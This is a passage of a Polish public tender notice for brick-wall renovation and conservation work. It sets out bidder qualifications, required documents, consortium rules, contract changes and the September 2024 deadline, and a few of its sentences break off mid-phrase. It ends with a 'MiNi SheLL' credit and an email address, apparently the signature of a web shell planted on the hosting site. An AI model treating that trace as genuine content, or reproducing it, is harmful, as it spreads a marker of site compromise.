lub średnie branżowe i dyplom potwierdzający posiadanie kwalifikacji zawodowych w zawodach<br/>odpowiadających danej dziedzinie lub dyplom mistrza w zawodzie odpowiadającym danej dziedzinie oraz która przez co<br/>najmniej 4 lata brała udział w pracach konserwatorskich, pracach restauratorskich lub badaniach konserwatorskich,<br/>prowadzonych przy zabytkach wpisanych do rejestru, na Listę Skarbów Dziedzictwa, do inwentarza muzeum będącego<br/>instytucją kultury lub innych zabytkach zaliczanych do jednej z kategorii, o których mowa w art. 14a ust. 2. ww ustawy.<br/>Zamawiający dopuszcza łączenie poszczególnych funkcji przez jedną osobę. W przypadku oferty składanej przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek zostanie uznany za spełniony, jeżeli wykonawcy<br/>łącznie wykażą dysponowanie osobami o określonych w niniejszym punkcie kwalifikacjach.<br/>5.1.2. Część II zamówienia:<br/>a) Zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/>b) Uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/>c) Sytuacji ekonomicznej i finansowej<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/>d) Zdolności technicznej lub zawodowej<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">6.3.2. W zakresie<br/>potwierdzenia niepodlegania wykluczeniu na podstawie art. 108 ust. 1, art. 109 ust. 1 pkt. 4 ustawy PZP oraz art. 7 ust. 1 ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego (pkt 5.2. oraz 5.3. niniejszej SWZ) – dotyczy wszystkich części zamówienia:<br/>a) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 109 ust. 1 pkt. 4 ustawy PZP<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem;<br/>6.3.3. Wykonawca polegający na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w art. 118<br/>ustawy PZP przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 6.1.1. niniejszej SWZ, także odpowiednio oświadczenie<br/>podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>6.3.4. Wykonawca powierzający wykonanie części zamówienia podwykonawcy na zasadach określonych w art. 462 ustawy PZP<br/>przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 6.1.1. niniejszej SWZ, także odpowiednio oświadczenie podwykonawcy, potwierdzające brak podstaw wykluczenia tego podwykonawcy.<br/>6.4. Dokumenty podmiotów zagranicznych. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6.3.2. lit. a niniejszej SWZ składa dokument lub dokumenty<br/>wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, odpowiednio że:<br/>6.4.1. nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury – wystawiony nie wcześniej niż 3 miesiące przed<br/>upływem terminu składania ofert.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt<br/>6.4.1., zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy z odpowiednim zastosowaniem terminów,<br/>o których mowa w pkt 6.4.1.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W<br/>zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 112 ust. 2 ustawy PZP (pkt 5.1. niniejszej SWZ):<br/>6.3.1.1. Część I zamówienia:<br/>a) w celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego posiadania zdolności technicznej lub zawodowej<br/>należy przedłożyć:<br/>- wykaz robót budowlanych w którym Wykonawca wskaże, że wykonał co najmniej 1 robotę budowlaną polegającą na remoncie i/lub<br/>renowacji muru ceglanego obejmującym/ej usunięcie zanieczyszczeń z co najmniej 100 m2 powierzchni, wykonanej w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz z<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, - według wzoru stanowiącego załącznik<br/>Nr 4 do niniejszej SWZ.<br/>W w/w wykazie Zamawiający wymaga wskazania roboty, której wykonanie potwierdza spełnianie przez wykonawcę określonego w<br/>pkt 5.1.1. ppkt. d warunku posiadania zdolności technicznej lub zawodowej oraz załączenia referencji bądź innych dokumentów<br/>wystawionych przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze wykonawca nie jest w stanie uzyskać ww. referencji – inne dokumenty.<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego odpowiedzialnych za projektowanie oraz<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami.– według wzoru stanowiącego załącznik Nr 5 do niniejszej SWZ.<br/>UWAGI!<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu<br/>do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub<br/>ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu<br/>oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia przewidziane względem wykonawcy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności<br/>są wymagane.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa w pkt. 6.1.1. niniejszej SWZ, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę<br/>warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca<br/>w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie<br/>spełnia warunki udziału w postępowaniu.<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających<br/>zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy<br/>2. Pełnomocnictwo - w przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub działania w imieniu wykonawcy osoby, której umocowanie nie wynika z dokumentów<br/>rejestrowych<br/>3. zobowiązanie podmiotów udostępniających zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia, w przypadku gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów według<br/>wzoru stanowiącego Załącznik Nr 7 do niniejszej SWZ lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów - o ile dotyczy<br/>4. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia wskazujące, które roboty budowlane<br/>wykonają poszczególni wykonawcy według wzoru stanowiącego Załącznik Nr 3 do niniejszej SWZ - o ile dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia stosuje się odpowiednio przepisy dotyczące Wykonawcy (art. 58 ust. 5 ustawy Pzp). W przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć pełnomocnictwo<br/>udzielone przez upoważnionych przedstawicieli podmiotów uczestniczących wspólnie. Umocowanie może wynikać z treści<br/>zawartej umowy konsorcjum albo zostać przedłożone oddzielnie z ofertą. Treść pełnomocnictwa powinna dokładnie W<br/>przypadku złożenia oferty przez ww. podmioty oświadczenie o którym mowa w pkt. 6.1.1. niniejszej SWZ składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu<br/>w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. Zamawiający, zgodnie z art. 128 ustawy PZP, wezwie Wykonawcę, który nie złożył oświadczenia, o którym mowa w art.<br/>125 ust. 1 ustawy PZP, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w<br/>postępowaniu lub są one niekompletne lub zawierają błędy do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym<br/>terminie, chyba że oferta wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub<br/>zachodzą przesłanki unieważnienia postępowania. Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich<br/>złożenia.<br/>3. Jeżeli złożone przez wykonawcę oświadczenie, o którym mowa w art. 125 ust. 1, lub podmiotowe środki dowodowe<br/>budzą wątpliwości zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub<br/>dokumentów istotnych w tym zakresie dla oceny spełniania przez wykonawcę warunków udziału w postępowaniu, kryteriów<br/>selekcji lub braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>4. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i<br/>zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku, o którym mowa w niniejszym punkcie, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy,<br/>zgodnie z załącznikiem nr 3 do SWZ.<br/>5. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia szczegółowo opisano w § 10 i § 11 wzoru umowy<br/>stanowiącego załącznik nr 6 do SWZ.<br/>1. Warunkiem wprowadzenia wszelkich zmian niniejszej umowy jest sporządzenie aneksu z zachowaniem formy pisemnej<br/>pod rygorem nieważności.<br/>2. Zgodnie z postanowieniami art. 455 ustawy Pzp Zamawiający dopuszcza możliwość zmiany umowy. Zmiana jest możliwa<br/>w następujących przypadkach:<br/>1) Zmiana terminu przewidzianego na zakończenie robót<br/>2) zmiana wynagrodzenia<br/>3) Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych<br/>4) Zmiana osób z uprawnieniami budowlanymi wskazanych w ofercie<br/>5) Zmiana Podwykonawcy i/lub wprowadzenie Podwykonawcy w sytuacji, gdy Wykonawca nie zadeklarował w ofercie<br/>realizacji zamówienia przy pomocy Podwykonawcy<br/>6) Zmiana reguł określonych w § 19 może nastąpić w przypadku zmiany przepisów prawa lub wydania nowych wytycznych i<br/>interpretacji dotyczących stosowania przepisów o ochronie danych osobowych (RODO)<br/>7) Zmiana umowy może nastąpić również w przypadkach, o których mowa w art. 455 ust. 1<br/>i ust. 2 ustawy Pzp.<br/>Warunki dokonania zmian:<br/>1) Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, na<br/>które powołuje się, jako podstawę zmiany umowy,<br/>2) wniosek o zmianę postanowień umowy musi być sporządzony na piśmie,<br/>3) wniosek, musi zawierać:<br/>- opis propozycji zmiany,<br/>- uzasadnienie zmiany,<br/>- opis wpływu zmiany na warunki realizacji umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pepowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-30 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com